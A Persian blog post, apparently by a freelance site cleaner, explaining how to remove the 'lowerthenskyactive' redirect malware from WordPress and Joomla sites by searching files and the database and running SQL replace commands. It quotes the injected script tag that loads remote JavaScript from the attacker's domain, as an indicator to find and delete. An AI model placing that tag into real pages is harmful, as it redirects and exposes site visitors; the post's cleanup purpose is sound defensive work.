ویروس ریدایرکت

ویروس ریدایرکت چیه ؟

در این نوشته به بررسی راه مقابله با ویروس ریدایرکت lowerthenskyactive  می پردازیم .
یک روز خدا بیدار میشید و میرید سایتتون رو ببینید و ببینید اوضاع از چه قراره که میبینید سایتتون به شکل عجیبی بالا میاد! چیزی شبیه تصویر زیر ! که سایت شما را به سایت دیگری ریدایرکت کرده و هی پیغام میده allow کن و دو تا دکمه allow و block هم نشون میده اما هیچ کدوم شرایط را تغییر نمیدن و … به این میگیم ویروس ریدایرکت !

بله سایت شما دچار حمله شده و کدهاش تغییراتی پیدا کردن که باعث شده هر کس میخواد سایت شما رو ببینه فرستاده میشه به ناکجا آباد!

اگر سایتتون آلوده شده و میخواهید اون رو پاکسازی کنم با من تماس بگیرید 09196071147

ویروس ریدایرکت وردپرس

من خودم اولین بار رو جوملا دیدم اما بعدش روی وردپرس هم دیدم و بعد دیدم خیلی ها در اینترنت دنبال عبارت ویروس ریدایرکت ورد پرس میگردن . به هرحال فکر میکنم این حمله میتونه هر سایتی رو درگیر کنه و راه حل حذف همشون هم یه چیزه : حذف کد های مخرب از داخل فایل ها و دیتابیس که الان براتون میگم چیکار باید بکنید.

حذف ویروس ریدایرکت

این ویروس بیشتر از همه فایل های index.php رو تغییر میدن تقریبا تمام فایلهای ایندکس رو آلوده میکنه و حتی ممکنه فایل های دیگری را هم آلوده کنه. همچنین این ویروس دیتابیس رو هم تغییر میده. بنابراین برای حذف ویروس باید همه این کد ها را پیدا کنم و حذف کنیم .

در مواردی دیده شده چندین فایل ایجاد کرده که دو گروه هستن برخی اسمهاشون عجیب غریبه مثلا cs5ght.php بعضیهاشون هم اسمشون خیلی عجیب نیست مثلا css.php یا options.php که همشون حاوی کدهای مخرب هستن !

حتی در برخی موارد در پوشه بالاتر از publichtml (ریشه سایت) هم فایل ایجاد میکنن .

حذف کد های ویروس ریدایرکت از فایلها :

بهترین روش اینه که شما همه فایل های متنی سایتتون رو دانلود کنید و در بین اونها جستجو کنید و کد مخرب را پیدا کنید و حذف کنید.

در مواردی که من دیدم کد مخرب یکی بود و در همه فایلها همون یک کد وارد شده بود آخرین بار که من این مشکل را دیدم کدی که به فایلها اضافه شده بود این بود :

<script type='text/javascript' src='https://flat.lowerthenskyactive.ga/m.js?n=nb5'></script>

چجوری پیداش کردم ؟ خیلی راحت فایل index.php در ریشه سایتم رو باز کردم و دیدم این کد در اول فایل هست !!

اگر شما دچار این مشکل شدید احتمال همین کد یا چیزی شبیه این رو میتونید پیدا کنید . وقتی کد رو پیدا کردید باید همه فایلهای متنی سایت رو دانلود کنید و با یک نرم افزار که داخل فایلها رو هم بتونه جستجو کنید و یک عبارت رو درون فایلها پیدا کنه و با عبارت دیگری جایگزین (find/replace) میتونید فایلها رو اصلاح کنید!

نکته : ویندوز امکان جستجو درون فایل رو داره اما در این مورد خوب جواب نداد و بعضی فایلها که حاوی کد بالا بودن رو تشخیص نداد! در ضمن امکان جایگزینی replace هم نداره.

من از برنامه textcrawler pro استفاده کردم که ورژن آزمایشی اش که رایگان هست و 15 روز کار میکنه هم بخوبی کارم رو راه انداخت ! من از اینجا دانلود کردم.

کار کردن با این برنامه خیلی راحته مسیری که فایلهاتون هست رو میدید کد مخرب رو هم میدید (در قسمت find) و در قیمت replace هم هیچی نمیزنید و بعد دکمه replace رو کلیک میکنید و خودش میگرده و کد رو در فایلها پیدا میکنه و با هیچی جایگزینش میکنه (کد رو حذف میکنه)

بعد از این ماجرا میتونید فایلها رو مجدد در سایتتون آپلود کنید و روی فایل های قبلی رونویسی کنید!

نکته : اکثر فایلهایی که آلوده شدن index.php هستند اما فایلهای دیگه هم ممکنه آلوده شده باشن.

حذف کدهای مالویر

خب بعضی وقت ها کد های مخرب یکی هستن و به راحتی با سرچ کردن میتونم پیداشون کنیم اما همیشه اینطور نیست مثلا در یک سایتی که اخیرا پاکسازی کردم بیش از 5 مدل کد وجود داشت در ززیر تصویر این کد ها رو میگذارم که بیشتر با این کدهای مخرب آشنا بشید

این کد اول فایل ها اضافه شده بود بودن یکسری عدد که توسط تابع پی اچ پی به نوشته تبدیل میشه کد رو مشکوک میکنه بنابراین اگه در فایلها اینجوری دید اعداد پشت سر هم قطار شدن شک کنید!

یکم به این کد دقت کنید متوجه میشید که عبارتی در بین دستورات مختلف پی اچ پی پنهان شده ! این کد در یکسری فایلهای js اضافه شده بود.

یک نمونه دیگه از کد های مخرب که در فایلهای جاوا تزریق شده بود

درهم تنیده بودن کدها یکی از نشانه هایی هست که میتوانید به مخرب بودن اون شک کنید معمولا کدهای سالم که برنامه نویسهای اصلی تولید میکنن این شکلی درهم برهم نیستن.

در تصویر بالا 4 کد مختلفف میبینید که در فایلهای Indedx تزریق شده بود و هر کردوم به شکلی یک فایل دیگه (با پسوند ott یا otc) رو فراخوانی میکرده که خب هم فایل ایندکس باید پاک بشه هم فایل otc یا ott . توجه داشته باشید ممکنه پسوند های دیگه ای هم استفاده بشه !

پاکسازی سایت وردپرسی

برای سایت های وردپرسی یا بطور کلی سایتهایی که با نرم افزار های اوپن سورس آلوده شدن یکی از مطمئن ترین راه های پاکسازی اینه که اطلاعات سایت و تصاویر رو بک آپ بگیرید و سایت رو کلا حذف کنید و از اول وردپرس (یا هر نرم افزاری که هست) رو نصب کنید و مجددا تصاویر و اطلاعات سایت رو در سایت قرار بدهید

فقط حواستون باشه همه افزونه ها (پلاگین ها) رو مججدد نصب کنید.

حذف کد های ویروس ریدایرکت از دیتابیس :

بعد از فایلها باید بانک اطلاعاتی رو هم چک کنیم به phpmyadmin سایتتون برید و همه جدول های دیتابیس رو برای پیدا کردن کد مخرب جستجو کنید.

بعد از پیدا کردن محل کد ها با دستوری شبیه دستور زیر میتونید اونها را حذف کنید

 UPDATE `table_name`
 SET `field_name` = replace(same_field_name, 'unwanted_text', 'wanted_text')

که table_name اسم جدول آلوده هست field_name اسم فیلد آلوده هست unwanted_text کد مخرب رو باید وارد کنیم و wanted_text رو باید خلی بگذاریم

بطور مشخص در دیتابیس وردپرس در جدول post که محتوای پستهای سایت را نگه داری میکند این کد در قسمت content وارد شده بود. دستوری شبیه زیر باید اجرا کنیم

 UPDATE `wp_post`
 SET `post_content` = replace(post_content, '<script type=''text/javascript'' src=''https://flat.lowerthenskyactive.ga/m.js?n=nb5''></script>', '')

با این دستور همه کدهای مخرب ویروس ریدایرکت حذف میشن. دقت کنید ممکنه جدول های دیگری هم آلوده شده باشند که باید آنها را هم پاکسازی کنید.

نکته در سایت وردپرس در جدول wp_options هم نیاز به اصلاح داشت در این جدول دو فیلد siteurl و home تغییر پیدا کرده بود که باید آدرس سایت و آدرس ریشه سایت خودمون رو وارد کنیم.

این مورد اخیر ممکنه در سیستم های دیگه در جدول های دیگه ای پیش آمده باشه پس مواظب باشید.

اگر بعد از همه این کارها هنوز سایتتون ریدایرکت میشه پلاگین ها رو غیر فعال کنید و یکی یکی فعالشون کنید ببینید کدوم یکی باعث مشکل میشه آپدیتش کنید یا کلا حذفش کنید! بخصوص افزونه های نال شده و افرونه هایی که مدتی هست آپدیت نشدن رو خیلی مواظب باشید!

اگه میخواهید من براتون سایتتون رو پاکسازی کنم با من تماس بگیرید

اگر باز هم مشکل برقرار بود برید سراغ قالب یا تمپلیت سایت اون رو به روز کنید !

خب سعی کردم همه موارد مربوط به ویروس ریدایرکت رو براتون بنویسیم و احتمالا بدون هیچ مشکلی میتونید خودتون اقدام به حذف ویروس ریدایرکت بکنید ولی اگر مشکل یا سوالی بود حتما در قسمت کامنت ها بنویسید تا بیشتر توضیح بدم!

شاید این مطالب هم برای شما مفید باشد : ثبت کسب و کار در گوگل مپ ۵ ستاره – هزینه طراحی سایت – هشتگ های پربازدید فارسی